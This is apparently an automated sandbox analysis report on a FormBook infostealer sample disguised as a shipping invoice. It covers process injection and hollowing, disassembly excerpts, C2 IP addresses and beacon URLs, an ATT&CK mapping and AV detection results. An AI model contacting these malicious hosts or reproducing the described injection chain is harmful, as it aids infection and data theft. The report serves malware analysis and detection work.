          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03731DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03731DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03731DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10002EDC GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,GetCurrentThreadId,__freeptd,
          Source: C:\Windows\SysWOW64\cmd.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\netsh.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10004CBC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10002ECD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10007786 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 75.126.100.11 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.24 80
          Source: C:\Windows\explorer.exeNetwork Connect: 95.215.210.10 80
          Source: C:\Windows\explorer.exeNetwork Connect: 165.227.229.15 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.88.85.105 80
          Hijacks the control flow in another processShow sources
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 77165050 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 771650F0 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 77165180 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 77165190 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 771651A0 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 7717FEE0 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 771133C0 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 77114760 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 770D6590 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 770DB510 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 770FC490 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 7711EE00 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 7711EFD0 value: E9
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\netsh.exeThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\cmd.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\SysWOW64\cmd.exeSection unmapped: C:\Windows\SysWOW64\netsh.exe base address: 9F0000
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'
          Source: explorer.exe, 00000004.00000002.914158425.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.710156984.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10008C6C cpuid
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10004896 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Lowering of HIPS / PFW / Operating System Security Settings:

          barindex
          Uses netsh to modify the Windows network and firewall settingsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1Credential API Hooking1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsAccess Token Manipulation1Deobfuscate/Decode Files or Information1LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolCredential API Hooking1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Process Injection612Obfuscated Files or Information3Security Account ManagerSystem Information Discovery124SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Install Root Certificate1NTDSSecurity Software Discovery251Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsVirtualization/Sandbox Evasion3SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection612Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRundll321Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 323227 Sample: Shipping INVOICE-BL Shipment..exe Startdate: 26/11/2020 Architecture: WINDOWS Score: 100 40 www.mapnimbis.com 2->40 56 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Multi AV Scanner detection for dropped file 2->60 62 5 other signatures 2->62 12 Shipping INVOICE-BL Shipment..exe 54 2->12         started        signatures3 process4 file5 32 C:\Users\user\AppData\Local\...\Prehnite.dll, PE32 12->32 dropped 34 C:\Users\user\AppData\Roaming\...\vjscsvr.exe, PE32 12->34 dropped 36 C:\Users\user\AppData\...\rcxditui.dll, PE32 12->36 dropped 38 8 other files (none is malicious) 12->38 dropped 15 rundll32.exe 12->15         started        process6 signatures7 72 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 15->72 74 Hijacks the control flow in another process 15->74 76 Maps a DLL or memory area into another process 15->76 18 cmd.exe 15->18         started        process8 signatures9 48 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 18->48 50 Modifies the context of a thread in another process (thread injection) 18->50 52 Maps a DLL or memory area into another process 18->52 54 3 other signatures 18->54 21 explorer.exe 18->21 injected process10 dnsIp11 42 www.wtmailer15.com 75.126.100.11, 49769, 80 SOFTLAYERUS United States 21->42 44 wastie.club 95.215.210.10, 49770, 80 NEWIT-ASRU Russian Federation 21->44 46 16 other IPs or domains 21->46 64 System process connects to network (likely due to code injection or exploit) 21->64 25 netsh.exe 21->25         started        signatures12 process13 signatures14 66 Modifies the context of a thread in another process (thread injection) 25->66 68 Maps a DLL or memory area into another process 25->68 70 Tries to detect virtualization through RDTSC time measurements 25->70 28 cmd.exe 1 25->28         started        process15 process16 30 conhost.exe 28->30         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Shipping INVOICE-BL Shipment..exe28%VirustotalBrowse
          Shipping INVOICE-BL Shipment..exe45%ReversingLabsWin32.Trojan.Woreflint

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dll2%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exe0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exe0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\Prehnite.dll28%ReversingLabsWin32.Trojan.Wacatac
          C:\Users\user\AppData\Local\Temp\fckeditor\makecert.exe0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\fckeditor\makecert.exe3%ReversingLabs
          C:\Users\user\AppData\Local\Temp\manage\mms\crtowordses.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\manage\mms\crtowordses.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.cmd.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.0.Shipping INVOICE-BL Shipment..exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.2.Shipping INVOICE-BL Shipment..exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.jddq888.com/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=mdpH1kYH/WNDw93QqiOdsAZgQKB+qpRxGfGsjxdQlClZxNZ4TMvv4sve4+Kmt2Uc51760%Avira URL Cloudsafe
          http://www.mehler.photography/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=YSPUSffqOivhj8Kjp9aQgNvPQF5V6gVVRQ45a2ufWFuMe0FJpEVxFN190mcOe42QTAaS0%Avira URL Cloudsafe
          http://www.carnesveymacr.com/mqgf/?1bz=hhd0GaXlZugFYZhq3yiAARtiWhMpNMVDAm1bIlTaIe3aIDvqoSX91Ws6MgCgWpSSj5gE&v2Jx9=0pY0Q8thwtJli0y00%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.wastie.club/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=uH4Dxo5rCetYkfO7KLYRcfVECb5esRD5h1WtuccCG6pO/xNVWEKD01dxTzpIBP2UrYly0%Avira URL Cloudsafe
          http://www.caelaabadie.com/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=r6ma+nh27c9Sl8Bs3eAjHKVnQZRxhfFeaDOjGF4iprZzpmOBYsqZcbWmCWTHzEvxY19a0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.thelonerangernews.com/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=Nu/G71QL4p4BT86mcqNaj5MI96K7Vz5eVXtDqKTsfKVXKjxrmX+SwuyoO8XqTg4wxzHG0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.gettingthehelloutofca.com/mqgf/?1bz=KR2H7bR68gwXZ0UwRZoWOm+3/bRM+9g3CvwIMuaCj43AHNBZDZgp33E9vheCRffBPsp5&v2Jx9=0pY0Q8thwtJli0y00%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.wtmailer15.com/mqgf/?1bz=o6fJD+zMZxVzOfk4IEdwtZQvSv9vl5cBPUt1QiawFeZ3y3tXUJIXw0nGuJCyWZvSLK28&v2Jx9=0pY0Q8thwtJli0y00%Avira URL Cloudsafe
